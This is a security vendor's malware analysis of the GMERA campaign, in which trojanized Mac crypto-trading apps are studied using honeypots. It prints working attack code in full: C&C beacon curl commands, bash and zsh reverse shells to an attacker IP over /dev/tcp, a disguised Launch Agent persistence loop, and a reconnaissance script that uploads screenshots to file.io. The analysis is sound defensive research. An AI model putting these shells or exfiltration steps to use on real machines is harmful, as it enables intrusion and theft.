ESET researchers lure GMERA malware operators to remotely control their Mac honeypots

Weve recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is used to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware samples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis they published in September 2019. As in the previous campaigns, the malware reports to a C&C server over HTTP and connects remote terminal sessions to another C&C server using a hardcoded IP address. This time, however, not only did the malware authors wrap the original, legitimate application to include malware; they also rebranded the Kattana trading application with new names and copied its original website. We have seen the following fictitious brandings used in different campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to the analysis of the malware code, ESET researchers have also set up honeypots to try to reveal the motivations behind this group of criminals.

We have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020, Kattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized app. We couldnt confirm that it was linked to this particular campaign, but it could very well be the case.

Figure 1. Kattana warns about trojanized copies of their software on Twitter

Copycat websites are set up to make the bogus application download look legitimate. For a person who doesnt know Kattana, the websites do look legitimate.

The download button on the bogus sites is a link to a ZIP archive containing the trojanized application bundle.

Malware analysis in this case is pretty straightforward. We will take the Licatrade sample as the example here. Other samples have minor differences, but the ideas and functionalities are essentially the same. Similar analyses of earlier GMERA campaigns are provided in Trend Micros blogpost and in Objective-Sees Mac malware of 2019 report.

Figure 4. Content of the Licatrade application bundle

Modification timestamps of the files in the ZIP archive, the date the application was signed, and the LastModified HTTP header when we downloaded the archive all show April 15th, 2020. This is highly suggestive that this campaign started on that date.

A shell script (run.sh) is included in the resources of the application bundle. This main executable, written in Swift, launches run.sh. For some reason, the malware author has duplicated functionality to send a simple report to a C&C server over HTTP, and to connect to a remote host via TCP providing a remote shell to the attackers, in both the main executable and the shell script. An additional functionality, in the shell script only, is to set up persistence by installing a Launch Agent.

Here is the full shell script source (ellipsis in long string and defanged):

#! /bin/bashfunction remove_spec_char(){echo "$1" | tr -dc '[:alnum:].r' | tr '[:upper:]' '[:lower:]'}whoami="$(remove_spec_char `whoami`)"ip="$(remove_spec_char `curl -s ipecho.net/plain`)"req=`curl -ks "http://stepbystepby[.]com/link.php?${whoami}&${ip}"`plist_text="ZWNobyAnc2R2a21d2Vpdm5laXZuZSc="echo "$plist_text" | base64 --decode > "/tmp/.com.apple.system.plist"cp "/tmp/.com.apple.system.plist" "$HOME/Library/LaunchAgents/.com.apple.system.plist"launchctl load "/tmp/.com.apple.system.plist"scre=`screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'`

#! /bin/bash

function remove_spec_char(){

echo "$1" | tr -dc '[:alnum:].r' | tr '[:upper:]' '[:lower:]'

}

whoami="$(remove_spec_char `whoami`)"

ip="$(remove_spec_char `curl -s ipecho.net/plain`)"

req=`curl -ks "http://stepbystepby[.]com/link.php?${whoami}&${ip}"`

plist_text="ZWNobyAnc2R2a21d2Vpdm5laXZuZSc="

echo "$plist_text" | base64 --decode > "/tmp/.com.apple.system.plist"

cp "/tmp/.com.apple.system.plist" "$HOME/Library/LaunchAgents/.com.apple.system.plist"

launchctl load "/tmp/.com.apple.system.plist"

scre=`screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'`

Its interesting to note that persistence is broken in the Licatrade sample: the content of the resulting Launch Agent file (.com.apple.system.plist) isnt in Property List format as launchd expects, but instead is the command line to be executed.

The decoded content (ellipses in long strings) of the $plist_text variable is:

echo 'sdvkmsdfmsdkxweivneivne'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'; done; echo 'sdvkmsdfmsdfmsnicvmdskxweivneivne'

echo 'sdvkmsdfmsdkxweivneivne'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'; done; echo 'sdvkmsdfmsdfmsnicvmdskxweivneivne'

If run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but that fails here. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server.

The Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed and successfully starts when the user logs in.

The various reverse shells used by these malware operators connect to different remote ports depending on how they were started. All connections are unencrypted. Here is a list of ports, based on the Licatrade sample.

Here are some example command lines used:

screen -d -m bash -c bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1

zsh -c zmodload zsh/net/tcp && ztcp 193.37.212[.]97 25734 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY

The rebranded Kattana application is also in the resources of the application bundle. We wanted to see if, besides the change in name and icon in the application, some other code was changed. Since Kattana asks for credentials for trading platforms to perform trading, we verified if the input fields of these were tampered with and if credentials were exfiltrated in some way. Kattana is built with Electron, and Electron apps have an app.asar file, which is an archive containing the JavaScript code of the application. We have checked all changes between the original Kattana application and the malicious Licatrade copycat and found that only strings and images were changed.

Figure 5. Partial difference between Kattana and Licatrade

Licatrade and its resources were all signed using the same certificate, having the common name field set to Andrey Novoselov and using developer ID M8WVDT659T. The certificate was issued by Apple on April 6th, 2020. It was revoked the same day we notified Apple about this malicious application.

Figure 6. Certificate used to sign Licatrade

Figure 7. Licatrade certificate was revoked May 28th, 2020

For each of the other campaigns we analyzed, a different certificate was used. Both were already revoked by Apple when we started our analyses. See the IoCs section for details about these. Its interesting to note that in the case of Cointrazer, there were only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their trojanized application. This, and the fact that we didnt find anything else signed with the same key, suggests they got the certificate explicitly for that purpose.

The malicious Licatrade application was available on the licatrade.com website and its C&C HTTP report server domain is stepbystepby.com. Both domains were registered using the levistor777@gmail.com email address. Searching for other domains registered with that email address reveals what looks like several previous campaigns. Here is a list of domains we found in samples or registered with that email address.

Both the websites and HTTP C&C servers receiving the malwares first report are hosted behind Cloudflare.

To learn more about the intentions of this group, we set up honeypots where we monitored all interactions between the GMERA reverse shell backdoors and the operators of this malware.

We saw no C&C commands issued via the HTTP C&C server channel; everything happened through the reverse shells. When it first connected, the C&C server sent a small script to gather the username, the macOS version and location (based on external IP address) of the compromised device.

#! /bin/bashfunction check() { if [ ! -f /private/var/tmp/.i ]; then write else if [ "$(( $(date +"%s") - $(stat -f "%m" /private/var/tmp/.i) ))" -gt "21600" ]; then write fi fi}function write() { getit=`curl -s ipinfo.io | grep -e country -e city | sed 's/[^a-zA-Z0-9]//g' | sed -e "s/city//g;s/country//g"` echo `whoami` > /private/var/tmp/.i echo `sw_vers -productVersion` >> /private/var/tmp/.i echo "$getit" >> /private/var/tmp/.i}checkcat /private/var/tmp/.i

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

#! /bin/bash

function check() {

if [ ! -f /private/var/tmp/.i ]; then

write

else

if [ "$(( $(date +"%s") - $(stat -f "%m" /private/var/tmp/.i) ))" -gt "21600" ]; then

write

fi

fi

}

function write() {

getit=`curl -s ipinfo.io | grep -e country -e city | sed 's/[^a-zA-Z0-9]//g' | sed -e "s/city//g;s/country//g"`

echo `whoami` > /private/var/tmp/.i

echo `sw_vers -productVersion` >> /private/var/tmp/.i

echo "$getit" >> /private/var/tmp/.i

}

check

cat /private/var/tmp/.i

which sent something like this to the operators:

jeremy10.13.4BratislavaSK

jeremy

10.13.4

Bratislava

SK

The TCP connection stays open and waits for further commands. In our case, after a while, the operators manually inspected the machine. Across several of our honeypots, the commands used to perform that inspection varied. Part of it was just listing files across the file system. Sometimes, they would copy-and-paste a base64-encoded script designed to list information to reveal whether the system is a honeypot or actually interesting. The script is decoded, then piped to bash.

Figure 8. Packet capture of the operator sending the base64-encoded secondary reconnaissance script

Here is the decoded script:

echo ""echo "------ Whoami ------"whoamiecho "------ IP info ------"curl -s ipinfo.ioecho "------ Mac Model ------"curl -s https://support-sp.apple.com/sp/product?cc=$(system_profiler SPHardwareDataType | awk '/Serial/ {print $4}' | cut -c 9-) | sed 's|.*(.*).*|1|'echo "------ MacOS Version ------"sw_vers -productVersionsw_vers -productVersion | grep -E "10.15.*" && echo -e "33[1;31m CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA 33[0m"sleep 1echo "------ MacOS Installed ------"date -r /var/db/.AppleSetupDoneecho "------ Disks ------"df -mecho "------ Video Output ------"system_profiler SPDisplaysDataTypeecho "------ Wifi Around ------"/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -secho "------ Virtual Mashine Detector ------"ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -E "irtual|racle|ware|arallels" || echo "Probably not a Virtual Mashine..."echo "--------------------------------"echo "------ Developer Detector ------"echo "--------------------------------"echo "||| Applications |||"ls -laht /Applications | grep -E "Xcode|ublime|ourceTree|Atom|MAMP|TextWrangler|Code|ashcode" && echo "-|Be Carefull|-"echo "||| Short Bash History |||"cat ~/.bash_history | head -n 20echo "------ Desktop Screen ------"echo "create screenshot..."sw_vers -productVersion | grep -E "10.15.*" & screencapture -t jpg -x /tmp/screen.jpg &> /dev/nullsips -z 500 800 /tmp/screen.jpg &> /dev/nullsips -s formatOptions 50 /tmp/screen.jpg &> /dev/nullecho "uploading..."curl -s -F "file=@/tmp/screen.jpg" https://file.io

1

2

Excerpt from:

Mac cryptocurrency trading application rebranded, bundled with malware - We Live Security